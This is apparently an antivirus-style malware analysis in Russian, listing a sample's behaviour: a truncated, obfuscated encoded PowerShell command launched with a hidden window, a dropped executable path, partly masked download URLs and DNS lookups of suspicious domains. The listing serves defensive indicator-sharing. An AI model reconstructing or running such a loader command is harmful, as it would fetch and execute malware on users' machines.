Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMARQB0AC0AaQB0AGUATQAgACgAIgB2AGEAcgAiACsAIgBpAGEAYgAiACsAIgBMACIAKwAiAEUAOgBlAHoAcQAiACkAIAAoACAAIABbAFQAWQBQAEUAXQAoACIAewAzAH0AewA0AH0AewAwAH0AewAxAH0AewAyAH0AIg...
- %HOMEPATH%\ohu29c8\is6u7n3\cwws2k.exe
- %HOMEPATH%\ohu29c8\is6u7n3\cwws2k.exe
- %HOMEPATH%\ohu29c8\is6u7n3\cwws2k.exe
- http://cl########.smartsolutionexperts.com/
- http://ba###news.com/wp-admin/z0lGKS/
- DNS ASK th#####liateincome.com
- DNS ASK cl########.smartsolutionexperts.com
- DNS ASK fi####otos.com.au
- DNS ASK vi####ntents.xyz
- DNS ASK sn###llers.com
- DNS ASK lu###asoft.com
- DNS ASK ba###news.com
- DNS ASK ar#####acksonctc.com
- DNS ASK pe####sacred.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMARQB0AC0AaQB0AGUATQAgACgAIgB2AGEAcgAiACsAIgBpAGEAYgAiACsAIgBMACIAKwAiAEUAOgBlAHoAcQAiACkAIAAoACAAIABbAFQAWQBQAEUAXQAoACIAewAzAH0AewA0AH0AewAwAH0AewAxAH0AewAyAH0AIg...' (со скрытым окном)